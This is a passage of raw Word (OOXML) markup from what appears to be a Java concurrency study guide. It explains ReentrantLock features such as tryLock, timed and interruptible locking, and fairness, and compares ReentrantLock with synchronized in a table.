          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the lock using lock() and unlock().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BF11BE"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ailing to call unlock() (e.g., in case of exceptions) can lead to deadlocks, so use it with try-finally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01186890"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ry Lock (Non-blocking):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20701B2E"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ryLock() lets a thread </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>try to acquire the lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without blocking. It returns immediately with true or false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B5986" w14:textId="77777777" w:rsidR="0035581D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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loc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ryLoc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C565B46" w14:textId="77777777" w:rsidR="0035581D" w:rsidRPr="00CE4B95"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y</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7F84DFE" w14:textId="77777777" w:rsidR="0035581D" w:rsidRPr="00CE4B95"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do something</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4E0A4" w14:textId="77777777" w:rsidR="0035581D" w:rsidRPr="00CE4B95"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ly</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0BAC57A" w14:textId="77777777" w:rsidR="0035581D" w:rsidRPr="00CE4B95"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loc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nlock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5836A140" w14:textId="77777777" w:rsidR="0035581D" w:rsidRPr="00CE4B95"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2D4FC7A" w14:textId="77777777" w:rsidR="0035581D" w:rsidRPr="00CE4B95"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ls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FE6A131" w14:textId="77777777" w:rsidR="0035581D" w:rsidRPr="00CE4B95"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ould not get the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4889010E" w14:textId="6BECA36A" w:rsidR="0035581D" w:rsidRPr="00CE4B95"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17A47A21"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imed Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDFA64"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ryLock(long timeout, TimeUnit unit) allows a thread to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wait for a certain period</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to acquire the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093615BF" w14:textId="77777777" w:rsidR="00A46F71" w:rsidRPr="00CE4B95"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8029132"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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loc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ryLock</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imeUni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ECOND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AED082A" w14:textId="77777777" w:rsidR="00A46F71" w:rsidRPr="00CE4B95"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80291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y</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25F33E8" w14:textId="77777777" w:rsidR="00A46F71" w:rsidRPr="00CE4B95"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80291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itical section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495746D6" w14:textId="77777777" w:rsidR="00A46F71" w:rsidRPr="00CE4B95"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80291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ly</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4456DD0" w14:textId="77777777" w:rsidR="00A46F71" w:rsidRPr="00CE4B95"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80291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loc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nlock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669297E1" w14:textId="77777777" w:rsidR="00A46F71" w:rsidRPr="00CE4B95"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80291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5CFFA42" w14:textId="3B27DF6D" w:rsidR="00A46F71" w:rsidRPr="00CE4B95"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8029132"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3484D6"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terruptible Lock Acquisition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D8DCCE"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lockInterruptibly() allows a thread to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interrupted</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while waiting to acquire the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6D49D3" w14:textId="67BC7B68" w:rsidR="00A46F71" w:rsidRPr="00CE4B95"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065744"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>loc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ockInterruptibly</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467F1395"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air Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141F029D"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can create a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fair ReentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that gives access to the longest-waiting thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D255C3" w14:textId="304F9CB8" w:rsidR="00A46F71" w:rsidRPr="00CE4B95"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879023"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> fairLock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eentrantLock</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tru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fairness = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123617C4" w14:textId="77777777" w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00825CF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0B65BC8">
          <v:rect id="_x0000_i1867" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="403A7685" w14:textId="77777777" w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00825CFF" w:rsidP="00825CFF">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Difference between synchronized and ReentrantLoc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29"/>
        <w:gridCol w:w="2641"/>
        <w:gridCol w:w="2221"/>
      </w:tblGrid>
      <w:tr w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w14:paraId="7D0C2171" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DE1AEA0" w14:textId="77777777" w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00825CFF" w:rsidP="00A46F71">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75F4EF96" w14:textId="77777777" w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00825CFF" w:rsidP="00A46F71">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ynchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="509847ED" w14:textId="77777777" w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00825CFF" w:rsidP="00A46F71">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ReentrantLock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w14:paraId="7772FD84" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="556BDDCA"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entrant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26288466"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B6BF3C0"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w14:paraId="041D79FC" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11749908"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y lock without blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="411F86EC"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7187DC5B"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 (tryLock())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w14:paraId="5BDD5C8C" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79DD73D0"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imed lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FB0E667"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0083D05E"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 (tryLock(timeout))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w14:paraId="1DAFF2FD" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56343BC1"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ruptible lock waiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CE538B3"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70BCFFD8"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 (lockInterruptibly())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w14:paraId="49596301" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02098E95"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airness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43AFA639"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non-deterministic order)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4488A61C"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 (optional fair mode)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w14:paraId="1AC2F46E" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0537E73F"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plicit unlock required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CAF131C"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="737CEDFD"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 (unlock())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4427DAA1" w14:textId="77777777" w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00825CF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EEBD163">
          <v:rect id="_x0000_i1868" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA40AED" w14:textId="77777777" w:rsidR="00014515" w:rsidRPr="00CE4B95" w:rsidRDefault="00014515" w:rsidP="00825CFF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47FB34F2" w14:textId="095AD4D8" w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00825CFF" w:rsidP="00825CFF">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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2AF552" w14:textId="77777777" w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00825CFF" w:rsidP="00825CF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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD9C084" w14:textId="77777777" w:rsidR="00A46F71" w:rsidRPr="00CE4B95" w:rsidRDefault="00825CFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more control</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> over the locking mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE5F8B7" w14:textId="77777777" w:rsidR="00A46F71" w:rsidRPr="00CE4B95" w:rsidRDefault="00825CFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>try-lock</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timed-lock</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interruptible-lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FA0AB7" w14:textId="029DDAF7" w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00825CFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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want </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fair thread scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for lock acquisition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0605E870" w14:textId="56C02EEE" w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008666E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5B974BD">
          <v:rect id="_x0000_i1869" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23456198" w14:textId="0F7963F0" w:rsidR="008666ED" w:rsidRPr="00CE4B95" w:rsidRDefault="008666ED" w:rsidP="008666ED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="296" w:name="_Toc196307776"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between lock and synchronized?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="296"/>
    </w:p>
    <w:p w14:paraId="31D6E300" w14:textId="041336FE" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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e lock (from java.util.concurrent.locks.Lock) and synchronized are both mechanisms used to ensure thread safety and synchronization in Java, but they have key differences in terms of functionality, flexibility, and usage. Here's a detailed comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCF4F7E" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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1. Basic Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B295C1A" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126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chronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBF4EA6" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="126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synchronized is a keyword in Java used to create a synchronized block or method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52392439" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="126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It provides a simple and straightforward way to ensure that only one thread can execute a block of code at a time for a given object or class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752F8A87" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="126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It is implicit and automatically acquires and releases the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE2457E" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126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Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7290D4B4" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="126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Lock is an interface in java.util.concurrent.locks package, implemented by classes like ReentrantLock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393CE6BE" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="126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It provides more flexibility and control compared to synchronized for handling locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706CC97B" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1263"/>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It requires explicit lock acquisition (lock()) and release (unlock()), offering more control over thread synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187A784F" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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2. Lock Ownership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6635A8" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
